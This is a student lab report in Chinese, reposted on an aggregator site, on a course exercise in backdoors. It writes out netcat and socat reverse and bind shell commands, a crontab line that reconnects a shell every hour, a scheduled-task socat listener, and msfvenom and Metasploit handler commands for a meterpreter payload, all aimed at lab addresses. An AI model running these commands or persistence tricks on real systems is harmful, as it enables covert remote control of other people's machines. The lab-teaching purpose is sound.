20232419 2025-2026-1《网络与系统攻防技术》实验二实验报告

news/2025/10/22 20:39:43/文章来源:https://www.cnblogs.com/gczy/p/19157500

一、实验内容

由于在不同的网络条件下多次尝试,因此IP会有所不同
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
掌握后门原理及免杀技术

二、问答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?
通过一个被恶意篡改的开源软件库或软件包,这个过程被称为 “供应链攻击”,它利用了我们对可信来源(如官方的软件包仓库)的信任。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
注册表 Run 键、计划任务、DLL 劫持 / 搜索顺序劫持、WMI 事件订阅
(3)Meterpreter有哪些给你映像深刻的功能?
全内存操作与无文件攻击、灵活的通信与传输机制、强大的权限提升和进程迁移、模块化的扩展能力
(4)如何发现自己有系统有没有被安装后门?
监控网络连接、检查异常系统资源占用、使用专业安全软件进行全盘扫描

三、实验过程

(1)使用netcat获取主机Shell,并cron启动某项任务。
先查询两机ip并测试本次实验用到的主机和虚拟机之间的连通性,发现可以互ping成功
屏幕截图 2025-10-20 091332

Kali linux-2025-10-20-09-12-51
在kali中输入nc -l -p 12138监听12138端口,并在windows的cmd中输入nc64.exe -e cmd.exe 192.168.175.129 12138
在kali界面就可以看到windows命令提示
屏幕截图 2025-10-22 194122

Kali linux-2025-10-20-09-12-51
接下来用windows获取kali的shell
与之相反,在windows输入nc64.exe -l -p 12138进行监听,而kali输入nc 192.168.5.6 12138 -e /bin/sh
屏幕截图 2025-10-20 091717

Kali linux-2025-10-22-20-00-28
(最底下那行)
可以看到windows获取了kali的shell
在虚拟机中启动cron并在主机监听
在虚拟机上利用crontab -e指令编辑定时任务,输入2用vim编辑器在最后一行添加
35 * * * * nc 192.168.5.6 12138 -e /bin/sh
表示每个小时的5分反向链接windows的12138端口
Kali linux-2025-10-22-20-02-48
这样即可在每个小时的5分获取kali的shell
image
(2)使用socat获取主机shell
在Windows中按Win+R,再输入compmgmt.msc打开计算机管理
点击创建任务,设置触发器,设置操作为启动先前下载好的程序socat.exe,添加参数:
tcp-listen:12138 exec:cmd.exe,pty,stderr
屏幕截图 2025-10-20 092908
屏幕截图 2025-10-20 092958
当到达设定时间后,windows弹出了一个窗口
屏幕截图 2025-10-20 093654
此时在kali输入socat - tcp:192.168.5.6:12138
可以发现我们成功获取了windows主机shell(dir命令的输出太长就不全部展示了)

Kali linux-2025-10-20-09-37-50

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在kali虚拟机上生成后门可执行程序,指令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.175.129 LPORT=12138 -f exe > 20232419_backdoor.exe
Kali linux-2025-10-22-20-22-34
后门程序创建成功
接下来在Kali上用nc 192.168.5.6 12138 < 20232419_backdoor.exe将生成的后门程序传过去
在主机可以查找到该程序
Kali linux-2025-10-20-09-53-29

屏幕截图 2025-10-20 095232

主机输入nc64.exe -l 12138 > 20232419_backdoor.exe开启监听
随后在kali虚拟机中输入msfconsole打开msf控制台

Kali linux-2025-10-20-10-18-18
接下来开始进行配置,依此输入如下命令:

点击查看代码
use exploit/multi/handler  #进入监听模块		
set payload windows/meterpreter/reverse_tcp	#攻击载荷	
set LHOST 192.168.175.129
set LPORT 12138
输入exploit开始监听,但从这里出了问题,卡死在了第一行就很就无法动过,后面的实验也做不了了。 #四、问题与解决 除了上面那个问题之外就没了,但无法解决,找同学和老师都没办法。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943726.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

dfs模板(p1036)

P1036 [NOIP 2002 普及组] 选数 题目描述 已知 \(n\) 个整数 \(x_1,x_2,\cdots,x_n\),以及 \(1\) 个整数 \(k\)(\(k<n\))。从 \(n\) 个整数中任选 \(k\) 个整数相加,可分别得到一系列的和。例如当 \(n=4\),\(k…

leetcode477. 汉明距离总和

leetcode477. 汉明距离总和477. 汉明距离总和🤡过不了的暴力解:class Solution {public int totalHammingDistance(int[] nums) {int n = nums.length,res = 0;for(int i = 0;i < n;++i){for(int j = i + 1;j &l…

Java中的修饰符

在 Java 中,修饰符(Modifiers)是用来修改类、方法、变量、构造器等定义的关键字。它们主要分为两大类:访问修饰符和非控制修饰符。 以下是 Java 中所有修饰符的详细分类和说明: 一、 访问修饰符 (Access Modifier…

CF2078D Scammy Game Ad

设 \(f_{i, j}\) 为第 \(j\) 道的小人选择了第 \(i\) 个门,从 \(i \sim n\) 能够对答案产生多少贡献,倒着转移即可。

[树状数组]P11855 [CSP-J2022 山东] 部署 题解

完全不需要剖分啊,不知道 tag 在打什么劲。 首先看题面。 操作1是正常的操作,开一颗线段树记录 dfs 序区间修改。 操作2是反常的操作。这题需要记 bfs 序。这样就可以确保一个节点的直连节点 bfs 序是连续的。然后再…

行列式+矩阵树定理

https://www.luogu.com.cn/article/48au0mw4 行列式 对于矩阵 \(A_{[n],[n]}\) 其行列式为 \(det(A) = \sum\limits_{1∼n 的排列 P}{(-1)^{P 的逆序对个数} \prod\limits_{i=1}^{n}{A_{i,p_i}}}\)。 行列式的性质:单…

测试金字塔与测试左移:提升软件质量的双翼策略

无论团队规模大小,从今天开始审视你的测试策略,思考如何将这两种策略应用到你的项目中,必将收获显著的质量提升和效率改进。在快速迭代的现代软件开发中,如何保证产品质量同时加速交付,成为每个团队面临的挑战。今…

兼职MOer的幸福生活

搬运一下。零.前言组合意义天地生,代数推导jzy。一.Miller-Rabin素性测试 Miller-Rabin-Miller-Rabin-Mikuer-Robin-Milker-Rocky-Morty-Rick。 费马素性测试 费马曾言道:“\(a^{p-1} \equiv 1 \pmod p\) ,当 \(p\)…

20232323 2025-2026-1《网络与系统攻防技术》实验二实验报告

一、实验内容 1.使用netcat获取主机操作Shell,cron启动某项任务。 2.使用socat获取主机操作Shell, 任务计划启动 。 3.使用MSF meterpreter生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell。 …

[职业技术学院逃生]

作品状态: \(\color{green}正在更新\) 作品下载 点我 公告 #1点击查看代码 关于"职业技术学院逃生破解版"的态度我方对于职业学院逃生破解版(后称"破解版")表示否认,在1.1.7后本文来自博客园,作…

C#/.NET/.NET Core技术前沿周刊 | 第 58 期(2025年10.13-10.19)

前言 C#/.NET/.NET Core技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NET Core领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与…

完整教程:阿里云上CentOS6.9(停止维护)导致的yum下载chrony失败如何解决?

完整教程:阿里云上CentOS6.9(停止维护)导致的yum下载chrony失败如何解决?pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-fam…

九、OpenCV中视频的录制 - 指南

九、OpenCV中视频的录制 - 指南2025-10-22 20:20 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !importa…

高端网站设计中的微交互:细节如何决定用户体验 - 指南

高端网站设计中的微交互:细节如何决定用户体验 - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas&q…

股票操作统计分析报告 - 2025-10-22

股票操作统计分析报告 - 2025-10-22生成时间: 2025-10-22 20:17:44数据来源: 9db.com股票操作统计分析报告数据统计时间: 2025-10-22 数据来源: 9db.com建仓次数最多的股票: 长江电力 (共2次)建仓详细统计 (前10名):1.…

2025年完整指南:DeepSeek OCR 如何通过“视觉压缩”将AI成本降低20倍?

2025年完整指南:DeepSeek OCR 如何通过“视觉压缩”将AI成本降低20倍?DeepSeek OCR 并非传统的光学字符识别工具,而是一种探索“视觉-文本压缩”的前沿AI模型。它通过将长文本转换成图像进行处理,极大地降低了计算…

LGP5494 [LG TPLT] 线段树分裂 学习笔记

LGP5494 [LG TPLT] 线段树分裂 学习笔记 \(\texttt{Luogu Link}\) 前言\(\texttt{Q:}\) 有什么数据结构是支持用合并&分裂查询答案信息的呢? \(\texttt{A:}\) \(\text{FHQ-Treap}\)。 \(\texttt{Q:}\) 还有吗? \…

k8s 常用命令 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

文档智能信息抽取技术在金融财税领域的应用研究与发展前景

在金融与财税这个由海量文档驱动的领域中,效率与准确性是生命线。从繁复的财务报表、五花八门的发票,到冗长的合同与合规文件,传统的人工处理方式不仅成本高昂、效率低下,还极易出错。随着人工智能技术的成熟,文档…

今日策略:年化436%,回撤7%,夏普比5.28, deap因子挖掘重构,附python代码 - 详解

今日策略:年化436%,回撤7%,夏普比5.28, deap因子挖掘重构,附python代码 - 详解pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; fo…